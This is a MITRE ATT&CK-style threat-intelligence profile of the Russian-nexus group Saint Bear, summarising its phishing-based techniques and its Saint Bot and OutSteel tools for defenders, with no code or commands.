Saint Bear

Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities.[1][2] Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.

ID: G1031
Associated Groups: Storm-0587, TA471, UAC-0056, Lorec53
Version: 1.0
Created: 25 May 2024
Last Modified: 12 August 2024

Associated Group Descriptions

Name Description
Storm-0587

[2]

TA471

[1]

UAC-0056

[1]

Lorec53

[1]

Techniques Used

Domain ID Name Use
Enterprise T1583 .006 Acquire Infrastructure: Web Services

Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.[1]

Enterprise T1059 Command and Scripting Interpreter

Saint Bear has used the Windows Script Host (wscript) to execute intermediate files written to victim machines.[1]

.001 PowerShell

Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.[1]

.003 Windows Command Shell

Saint Bear initial loaders will also drop a malicious Windows batch file, available via open source GitHub repositories, that disables Microsoft Defender functionality.[1]

.007 JavaScript

Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.[1]

Enterprise T1203 Exploitation for Client Execution

Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.[1]

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.[1]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality.[1]

Enterprise T1656 Impersonation

Saint Bear has impersonated government and related entities in both phishing activity and developing web sites with malicious links that mimic legitimate resources.[2]

Enterprise T1112 Modify Registry

Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality.[1]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

Saint Bear clones .NET assemblies from other .NET binaries as well as cloning code signing certificates from other software to obfuscate the initial loader payload.[1]

.013 Obfuscated Files or Information: Encrypted/Encoded File

Saint Bear initial payloads included encoded follow-on payloads located in the resources file of the first-stage loader.[1]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access.[1]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails.[1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH."[1]

Enterprise T1204 .001 User Execution: Malicious Link

Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.[1][2]

.002 User Execution: Malicious File

Saint Bear relies on user interaction and execution of malicious attachments and similar for initial execution on victim systems.[1]

Enterprise T1497 Virtualization/Sandbox Evasion

Saint Bear contains several anti-analysis and anti-virtualization checks.[1]

Software

ID Name References Techniques
S1017 OutSteel OutSteel is uniquely associated with Saint Bear as a post-exploitation document collection and exfiltration tool.[1] Application Layer Protocol: Web Protocols, Automated Collection, Automated Exfiltration, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: AutoHotKey & AutoIT, Data from Local System, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: File Deletion, Ingress Tool Transfer, Lateral Tool Transfer, Masquerading: Match Legitimate Name or Location, Phishing: Spearphishing Link, Phishing: Spearphishing Attachment, Process Discovery, User Execution: Malicious Link, User Execution: Malicious File
S1018 Saint Bot Saint Bot is closely correlated with Saint Bear operations as a common post-exploitation toolset.[1] Abuse Elevation Control Mechanism: Bypass User Account Control, Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Data Encoding: Standard Encoding, Data from Local System, Debugger Evasion, Deobfuscate/Decode Files or Information, File and Directory Discovery, Hijack Execution Flow, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading, Masquerading: Match Legitimate Name or Location, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Software Packing, Phishing: Spearphishing Link, Phishing: Spearphishing Attachment, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Asynchronous Procedure Call, Process Injection: Process Hollowing, Query Registry, Scheduled Task/Job: Scheduled Task, System Binary Proxy Execution: Regsvr32, System Binary Proxy Execution: InstallUtil, System Information Discovery, System Location Discovery, System Network Configuration Discovery, System Owner/User Discovery, User Execution: Malicious File, User Execution: Malicious Link, Virtualization/Sandbox Evasion: Time Based Evasion, Virtualization/Sandbox Evasion: System Checks

References